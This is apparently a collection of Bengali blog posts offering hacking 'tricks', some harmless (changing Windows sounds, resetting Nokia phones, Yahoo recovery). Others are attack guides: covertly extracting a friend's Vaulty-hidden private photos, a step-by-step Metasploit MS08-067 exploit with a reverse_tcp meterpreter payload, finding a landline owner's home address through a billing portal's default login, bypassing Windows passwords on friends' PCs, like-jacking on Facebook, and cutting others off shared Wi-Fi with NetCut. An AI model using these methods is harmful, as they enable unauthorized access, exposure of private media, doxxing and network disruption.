আজ আপনাদের জন্য লিখতে বসছি একটি এনড্রয়েড এপস Vaulty হ্যাকিং নিয়ে। আশা করি কমেন্ট করে আপনার কথাগুলো জানাবেন। প্রথমেই বলে নেই আমি এনড্রয়েড ব্যবহার করিনা। আমার বন্ধুর সাথে মজা করে এই ট্রিকসটি আবিষ্কার করেছি। আগে হয়তো এটি বিভিন্ন জায়গায় শেয়ার হয়ে থাকবে তবে আমার চোখে পড়েনি তাই শেয়ার করলাম। এটি সম্পূর্ণভাবে আমার মষ্তিস্কপ্রসূত। কারো ক্ষতির উদ্দেশ্যে ব্যবহার আইনত দন্ডনীয় অপরাধ এবং এর অপব্যবহারে আমি দায়ী থাকব না। আমরা অনেকেই এনড্রয়েডে নিজেদের ব্যক্তিগত তথ্য (যেমন: ছবি, ভিডিও ….) লুকিয়ে রাখতে বা সিকিউর করতে Vaulty নামে একটি এপ ব্যবহার করি। আর ভাবি যে, এই বার আমি নিরাপদ। তবে আশাকরি এইবার আর আপনি নিরাপদ নন :v যাইহোক, শুরু করি Vaulty হ্যাকিং যা যা লাগব একটি এনড্রয়েড মোবাইল (আমাদের টার্গেট) Vaulty ইন্সটল করা EsExplorer (নামটা ঠিক আছে কিনা মনে নাই) বুদ্ধি প্রথমে আপনার বন্ধুর মোবাইলটা একটু কায়দা করে সরিয়ে নিন। এবার তার মোবাইলে EsExplorer ইন্সটল করুন (যদি না থাকে) । আর ইন্সটল করা থাকলে সেখানে ঢুকে অপশন থেকে হিডেন ফাইল্স শো করার অপশন টিক দিয়ে দিন। (আমার কাছে এখন এনড্রয়েড না থাকায় স্ক্রিনশট দিতে পারছি না, তাই সরি) এবার প্রায় আমরা কাছাকাছি চলে এসেছি। এবার DCIM ফোল্ডার থেকে .Vaulty ফোল্ডারে ঢুকুন। অথবা, Vaulty লিখে সার্চ দিন। এবার সেখানে অনেক ফাইল দেখতে পাবেন(আর ফোল্ডার আছে কিনা সিউর না ) এবার একটু বুদ্ধি লাগবে। কারন আমরা এবার ফাইল রিনেম করে এক্সটেনশন চেন্জ করব। ফোল্ডারের ফাইলগুলার প্রপার্টিস চেক করুন। যেগুলোর সাইজ বড় সেগুলো ভিডিও হওয়ার সম্ভাবনা আছে। এভাবে একটু অনুমান করে .vdata এক্সটেনশন .mp4 , .3gp , .jpg ….. এভাবে পরিবর্তন করে দেখুন। অথবা পরবর্তীতে করার জন্য ফাইলগুলো আপনার মোবাইলে ব্লুটুথ দিয়ে নিয়ে নিন। ব্যস এবার কাজ শেষ। এবার যতখুশি আপনার বন্ধুকে চ্যালেন্জ দিন বা দেখে নিন তার গোপন ছবি বা ভিডিও [বি:দ্র: এটি করার আগে আপনার বন্ধুর অনুমতি নিয়ে নিন, অনুগ্রহ করে কারো ক্ষতি করবেন না] [কারো ক্ষতি হলে এই পোস্টের লেখক দায়ী থাকবে না] আমি এই পদ্ধতি ব্যবহার করেছি নিম্নোক্ত মোবাইল Symphony Xplorer W15 Symphony Xplorer W65i এবং সফল হয়েছি। তাই আমি নিশ্চয়তা দিতে পারব না যে সকল মোবাইলে কাজ করবে। তবে আপনি কোন ধরনের মোবাইলে সফলতা পেয়েছেন তা অবশ্যই জানাবেন। ধন্যবাদ।

শুধু IP ব্যবহার করে যে কারো ১২টা বাজিয়ে দিন!! (update)

এটা একটু Advance Level এর হ্যাকিং। অনেকেরই হয়ত বুঝতে অসুবিধা হতে পারে। সেক্ষত্রে কমেন্টস করুন শুধু কি IP সিস্টম হ্যাক করা সম্ভব, হ্যা। কারন NetAPI32.dll(CVE-2008-4250) দুর্বলতা।.[netapi32.dll is a module that contains the Windows NET API used by applications to access a Microsoft network] (Details about Server Service Vulnerability(MS08-067): Microsoft Windows Server service provides support for sharing resources such as files and print services over the network. The Server service is vulnerable to a remote code-execution vulnerability. The vulnerability is caused due to an error in netapi32.dll when processing directory traversal character sequences in path names. This can be exploited to corrupt stack memory by e.g. sending RPC requests containing specially crafted path names to the Server Service component. The ‘NetprPathCanonicalize()’ function in the ‘netapi32.dll’ file is affected. A malicious request to vulnerable system results in complete compromise of vulnerable computers. This vulnerability affects Windows XP, Windows 2000, Windows Server 2003, Windows Vista, and Windows Server 2008. But Attackers require authenticated access on Windows Vista and Server 2008 platforms to exploit this issue. Exploiting the MS08-067 using Metasploit) আপনার টার্গেট সিস্টেম যদি Vulnerable OS ব্যবহার করে তাহলে আপনি তাকে খুব সহজেই হ্যাক করতে পারবেন। এই প্রক্রিয়া সম্পন্ন করতে যেগুলো প্রয়োজনঃ Virtual Box Backtrack 5 Target OS Step One: Create Virtual Machine দুইটি Virtual Machine তৈরি করুন, একটার নাম দিন Target OS এবং অন্যটার নাম দিন BT5। Target OS এ Windows XP Install করুন, এবং BT5 এ Backtreack 5 Install করুন। আপনার যদি Virtual Machine সম্পর্কে ধারনা না থাকে তাহলে VM Manual পড়ুন। Step Two: Find the IP address of Target Target এর IP বের করার জন্য VM(XP) তে cmd prompt ওপেন করুন(W R cmd and hit enter) এবং টাইপ করুন ipconfig এবং Enter প্রেস করুন। (সাধারনত Advance হ্যাকাররা IP জানতে অন্য ধরনের পদ্ধতি অনুসরন করে, যেমনঃ Angry IP Scanner বা লিঙ্ক পাঠিয়ে ও অনেকেই IP বের করেন। Step three এবার আমরা namp tool ব্যবহার করব। BT5(Backtrack 5) Start করুন এবং Terminal Open করুন Type করুনঃ nmap -O 192.168.56.12 এখানে 192.168.56.12 হল Target machine এর IP ।ফলাফল দেখুন, আপনি টার্গেট এর open port এবং OS দেখতে পাবেন। Step four: Metasploit এবার BT5 এর Terminal ওপেন করুন, (Ctrl Alt T)এবং টাইপ করুন msfconsole। Msfconsole, Metasploit Framework এর সবচেয়ে জনপ্রিয় একটা বৈশিষ্ট্য। এবার আমরা সার্চ কমান্ড ব্যবহার করব।, এজন্য “search netapi” টাইপ করুন। এবার আপনি অবশ্যই netapi এর সাথে Module Match লিস্ট দেখতে পাবেন। এবার আমরা MS08-067, exploit করব। সুতরাং টাইপ করুনঃ “use exploit/windows/smb/ ms08_067_netapi“ Step 5: Set Payload Type “set payload windows/ meterpreter/reverse_tcp” in the msfconsole. Step 6: Options Type “set LHOST 192.168.56.10“. এখানে 192.168.56.10 হল Backtrack এর IP। আপনি টার্মিনালে ‘ifconfig’ লিখেও এটা পেতে পারেন। এবার Type “set RHOST 192.168.56.12“ এখানে 192.168.56.12 হল টার্গেট মেশিন এর IP। Step 7: Exploiting এবার এটা দুর্বলতার সুযোগ নেয়ার সময় সুতরাং type “exploit” in the console, যদি এক্সপ্লয়েট সাক্সেস হয় টাহলে আপনিও নিচের মত ফলাফল দেখতে পাবেন। এখন আপনি Remote Computer কে নিজের মত Control করতে পারবেন। যেমন Screen Shot নেয়ার জন্য টাইপ করুন, “screenshot” এবং দেখুন আপনার ভিক্টিমের Screen Shot

T&T নম্বর দিয়ে এবার আপনাকে যে ডিস্টার্ব করবে তার ১২টা বাজিয়ে দিন!

কেমন আছেন সবাই? আশা করি সবাই বেশ ভালোই আছেন।আমার অবস্থা আর কিবলব? সামনে কলেজে পরীক্ষা শুরু কিন্তু পড়াশোনায় মন নেই। আপনারা দোয়া করেন যাতে পাশ মার্কসটা কোনো মতে উঠে।যাই হোক মূল আলোচনার দিকে আসি এবার।অনেকের বাসা এখন TnT ফোন থাকে।অনেকেই TnT দিয়ে ফোন করে ডিস্টার্ব করে। TnT অফিসে গিয়ে ইচ্ছা করলে TnT নম্বরের Address বের করা যায়। কিন্তু এতো ঝামেলার মধ্যে কে যায়?? যদি আপনি নিজেই সেই ডিস্টার্বকারীর Address বের করতে পারেন ! ! ! চলুন শিখে নিই,কীভাবে আপনি এই কাজটি করবেন। প্রথমে এখানে ক্লিক করুন http://203.112.222.42এবার নিচের ছবির মত একটি পেজ আসবে। সেখান থেকে Login এ ক্লিক করুন। তারপর যেই উইন্ডোটা আসবে সেখানে Login করার জন্য ২ টি বক্স দেখা যাবে। প্রথম বক্সটিতে অর্থ্যাৎ Customer ID (Area Code Phone) এ আপনি যেই নম্বরের Address বের করতে চান সেই নম্বরের এরিয়া কোড সহ লিখুন। [যেমনbr /> 02XXXXXXX .এখানে ০২ এরিয়া কোড। ] ২য় বক্সে ও আপনি একই ভাবে ওই নম্ববটি এরিয়া কোড সহ বসাবেন। এরপর Login এ ক্লিক করুন। এরপর যেই পেজটি আসবে সেইখান থেকে নিচের ছবির মত PRINT/VIEW CUSTOMER BILL সিলেক্ট করুন। তারপর PRINT/VIEW DUPLICATE BILL (AFTER JULY 2009) অথবা PRINT/VIEW DUPLICATE BILL (BEFORE JULY 2009) সিলেক্ট করবেন। এবার যেই পেজ আসবে সেখানে যদি PRINT/VIEW DUPLICATE BILL (AFTER JULY 2009) সিলেক্ট করে থাকেন তবে জুলাই ২০০৯ এর পরের কোন মাস এবং বছর লিখে Submit করুন। আর যদি PRINT/VIEW DUPLICATE BILL (BEFORE JULY 2009) সিলেক্ট করে থাকেন তাহলে,জুলাই ২০০৯ এর আগের কোন মাস এবং বছর লিখে Submit করুন এবার নিচের ছবির মত একটি বিলের পেজ আসবে। আর আশা করি আপনারা জানেন যে, বিলের TnT বিলের পেজে বাসার ঠিকানা লেখা থাকে। হে হে হেহ! কি এবার তাহলে যেই TnT নম্বর দিয়ে ফোনে ডিস্টার্ব করবে তার ১২টা বাজায় দিন। আরেকটা জিনিসও শিখিয়ে দেই। ইচ্ছা করলে আপনি এই সিস্টেমটা বাতিল করে দিতে পারেন যাতে কেউ আপনার TnT নম্বর দিয়ে আপনার Address বের না করতে পারে। খুব সোজা কাজ ৩য় ছবিটা লক্ষ্য করুন, সেখানে Change Password অপশনটা সিলেক্ট করে Password Change করে আপনার ইচ্ছামত Password দিয়ে দিন। ব্যস ! এবার আপনাকে কেউ বের করতে পারবে না।(BTCL অফিসের সাহায্য ছাড়া ) [বিঃদ্রঃ পোস্টটি শিক্ষনীয়, তাই কেউ পোস্টটির Misuse করলে পোস্টের লেখক দায়ী থাকবে না ]

এখন থেকে কোন সফটওয়্যার ছাড়াই আপনার কম্পিউটার আপনার কথা বলবে

এখন থেকে কোন সফটওয়্যার ছাড়াই আপনার কম্পিউটার আপনার কথা বলবে আপনার কম্পিউটারের অপারেটিং সিস্টেম সাউন্ড হবে আপনার ইচ্ছে মত। যেমনঃ কম্পিউটার অন-অফ, ইউএসবি ইন-আউট, ভুল-ডান ইত্যাদি। তাহলে আপনাকে যা করতে হবে- আপনার কম্পিউটার Explorer দিয়ে Open করুন, এবার C Drive এ যান, তারপর WINDOWS এ যান, দেখুন সেখানে Media ফোল্ডার আছে- ঢুকুন Media মিডিয়া ফোল্ডার এ----- দেখুন অনেক গুলো Media ফাইল রয়েছে, এবার দেখুন আপনার কোনটা লাগবে বা কোনটা ব্যবহার করতে চান তা আপনার পছন্দ মত দেখে নিন এবং যে ফাইলটি আপনার পছন্দ সেই ফাইল নেম অনুযায়ী আপনার ইচ্ছমত ফাইল কপি করে সেখানে পেস্ট করে রিপ্লেস করুন এবং যে ফাইলটি কপি করবেন সেটা WAV ফরমেত হতে হবে। এবার আপনার কম্পিউটার Restart নিন---- দেখুন এবার মজা.......................................

নকিয়া ফোন ফ্লাশ দিন নিজে নিজে

»»1.press *#7780# »»2. Press *#7370# »»3.ফোন অফ করে অন করার সময় ফোনের স্টার ( * ) KEY ,"3"নম্বর KEY, সবুজ (কল) বাটন এবং Power বাটন একসাথে চেপে ধরে রাখুন যতক্ষণ না ডিসপ্লে তে NOKIA লেখা ও আলো দেখা যায়। »»4.Nokia 5800 এর জন্যঃ সবুজ (কল) বাটন, লাল (রিজেক্ট) বাটন, Multimedia বাটন ও Power বাটন একসাথে চেপে ধরে রাখুন »»5.Nokia N97 এর জন্যঃ Shift space delete এবং Power বাটন একসাথে চেপে ধরে রাখুন »»6.অন্যান্য Nokia S60v5 ফোনের জন্যঃ সবুজ (কল) বাটন, লাল (রিজেক্ট) বাটন, camera বাটন এবং Power বাটন একসাথে চেপে ধরে রাখুন এরপর ফোন অন হলে দেখবেন আপনার ফোন পুরো NEW হয়ে গেছে

এবার আপনার ফোন নাম্বার দিয়েই আপনার অবস্থান বের করুন [না দেখলে সিরাম মিস]

এবার আপনার ফোন নাম্বার দিয়েই আপনার অবস্থান বের করুন [না দেখলে সিরাম মিস] চলুন দেখে নিই কিভাবে মোবাইল নাম্বার দিয়ে মোবাইল মোবাইল এর অবস্থান খুজে বের করবেন । এটা খুব সোজা এর জন্য আমাকে যাযা করতে হবে নিচে দেখুন …… ► প্রথমে এই লিঙ্কে http://www.themobiletracker.comক্লিক করুন আপনার দেশ সিলেক্ট করুন না করলেও হবে ওটা নিজে থেকেই নিয়ে নেবে। তারপর Phone Number এর যাইগাই প্রথমে আপনার দেশের কোড লিখুনl তারপর মোবাইল নাম্বার টাইপ করুন। ► উপর কাজ হয়েগেলে Click to Track এ ক্লিক করুন। তারপর দেখে নিন মোবাইল নাম্বার এর অবস্থান। আপনারা সকলেই ভাল থাকবেন..

Security Question মনে নাই? তাইYahoo তে Sign in করেত পারেছন না? আসুনজেনে নিই updated

অনেক সময় yahoo তে সাইন ইন করতে গেলে verify করতে তারা security question এ দেওয়া উওর চায় কিন্তু আমরা অনেকেই তা মনে রাখিনা তাই বহু দিনের ব্যবহার করা E- ID ওপেন করা সম্ভব হয়না। পর পর ৩ বার ভূল জবাব দিলে ২৪ ঘন্টার জন্যE- ID LOCK হয়ে যায়। আসুন জেন নেই কি ভাবে তা পুনরায় ওপেন করেবন। প্রথমে এই লিংকে যান http://help.yahoo.com/kb/index?page=home&locale=en_US এর পর একিট page আসেব তাতে ডানে quick link locked account এ click করুন । এর পর একিট page আসেব সেখানে email a support agent এ ক্লিক করুন। এর পর একটি ফরম আসেব তা পুরন করুন সেখানে আপনাকে নতুন E-ID (WITHOUT YAHOO) দিত হেব। এর পর NEXT করুন । কিছুক্ষন পর আপনার দেওয়া নতুন ই মেইলে তা confirm করা হেব ,২৪ ঘন্টার মেধ্য অাবার new mail id তে mail অাসেব তাতে একটি লিংক দিবে সেখানে ক্লিক করেল yahoo sign in page আসেব এখানে locked ID & PASSWORD দিয়ে SIGN করুন একিট বক্স আসেব সেখানে নতুন দেওয়া E-ID VERIFY করতে left radio button ক্লিক করে next করুন , আবার একটি বক্স আসেব তাতে verification code চাইবে যা ইতমেধ্য নতুন দেওয়া E-ID তে যাবে তা সংগ্রহ কের verify করেলএকিট বক্স আসেব সেখানে আপনার পুরাতন password দিন ও new password টাইপ কের sendকরেল আপনার id verify হবে এখন নতুন password দিয়ে sign inকরতে পারেবন।

Facebook এ Status & Fun Page এ LikE নিন চালাকি করে!!! না পারলে আপনার Loss.!!!

আপনারা যদি আপনাদের স্ট্যাটাস বা পেইজ এ চালাকি করে লাইক নিতে চান , তাহলে প্রথমে আপনাকে Opera 4.2অথবা Opera 4.4অথবা 4 লাগবে । তারপর Facebook এ লগ-ইন করুন । তারপর যেকোন কিছু Share করুন । আপনি যেটা শেয়ার করবেন তাতে লাইক দিবেন না । এখন ঐ Share টাতে Like লেখা থাকবে । ওটা Opera দিয়ে Select করুন । কিন্তু Ok করবেন না । Ok করলে লাইক হয়ে যাবে । তাহলে চালাকি টা হবে না । এখন Opera(মোবাইলে) তে 1 চাপুন । তাহলে একটা Download window আসবে । ওখানে প্রথমেই একটা লিংক দেয়া থাকবে । এখন ঐ লিংক টা কপি (Copy) করুন আর Facebook এ যেখানে খুশি শেয়ার করুন । এখন যে লোক ই ঐ লিংকে Ok করবে তার লাইকটা নিজে নিজেই হয়ে যাবে । এভাবে আপনি আপনার পেইজ এর লাইক ও নিতে পারবেন !

হ্যাক করুন যেকোনো পাসওয়ার্ডদেওয়া কম্পিউটার ! (নতুন দের জন্য কোন প্রকারসমস্যা ছাড়া)

অন্যের কম্পিউটার হ্যাক করার মজাই আলাদা। হ্যাকিং কথাটির অর্থ হল বিনা অনুমতিতে ব্যবহার। এসব ক্ষেত্রে বন্ধুদের কম্পিউটার হ্যাক করতে বেশি ভালো লাগে। নিরাপত্তার জন্য আমরা সবাই আমাদের কম্পিউটার পাসওয়ার্ড দিয়ে লক করে রাখি। এটা খুব কার্যকরী একটা প্রক্রিয়া। কিন্তু সমস্যা হল কম্পিউটার পাসওয়ার্ড দিয়ে লক করা। ফলে কম্পিউটার গুলো ব্যবহার করা যায় না। আমারা এই প্রক্রিয়ায় উইন্ডোজ এর পাসওয়ার্ড বাইপাস করে পিসি তে লগ ইন করতে পারবেন খুব সহজেই। নিচের ডাউনলোড লিঙ্ক থেকে সফটওয়্যার টি ডাউনলোড করে নিন। এর পর সফটওয়্যারটিকে সিডিতে বার্ন করান। আপনি চাইলে পেনড্রাইভএ ও সফটওয়্যারটিকে লোড করাতে পারেন। এর পরের কাজ খুব সহজ। কম্পিউটার এ সিডি প্রবেশ করিয়ে রি স্টার্ট দিন। বুট মেনু থেকে বুট ডিভাইস আপনার সিডি বা পেনড্রাইভ সিলেক্ট করে দিন। সব কাজ শেষ। এবার বন্ধুদের কম্পিউটার হ্যাক করে তাক লাগিয়ে দিন। আর বন্ধুদের কাছে হয়ে যান হ্যাকিং মাস্টার। Go here for Download

এবার google.com চলান আপনার নাম দিয়ে…!চমকে দিন সবাইকে..। আর বলুন যে আপনি google হ্যক করে ফেলছেন…।

কী চমকে গেলন । আমি জা বলছি এটা একদম সত্য প্রমান করে দিবো চলেন । প্রথমে এই লিংকে জান এখানে দুটি BOX পাবেন নিচের টিতে আপনার নাম লিখুন । ---এবং Submit করুন ।এরপর আপনি আপনার জা দরকার এখানে লিখে সার্চ করুন । এবং চমকে দিন সবাইকে এবং মজালন নিজ । সবাই একটু আমার কথা মনে রাইখেন । আপনাদের জন্য সারা দিন কাজ করি তারপর এত সুন্দর একটি টপিক দিতে হয় ।

সুপার ডুপারঃ অন্যের wifi zone এ সবাইকে BLOCKকরে একাই উপভোগ করুন সম্পূর্ন স্পিড

সুপার ডুপারঃ অন্যের wifi zone এ সবাইকে BLOCK করে একাই উপভোগ করুন সম্পূর্ন স্পিড আজ আমি যে Software টি করতে যাচিছ তা হলো Net cut.exe এই Software টি দিয়ে আপনি wifi zone এর মালিক না হয়েও সবাইকে ব্লক করতে পারবেন এবং একাই মজা লুটতে পারবেন । এটা যে কোন personal বা free wifi zone এ কাজ করবে । প্রথমে আপনি software টা ওপেন করুন এবং ডান পাশে refresh now তে ক্লিক করুন । তারপর আপনি যাকে cut off বা block করতে চান তাকে সিলেক্ট করুন এবং cut off এ ক্লিক করুন ব্যস আপনার কাজ শেষ এখন আপনি একাই মজা লুটুন এবং হয়ে যান একজন মিনি হ্যাকার... Click Here To Download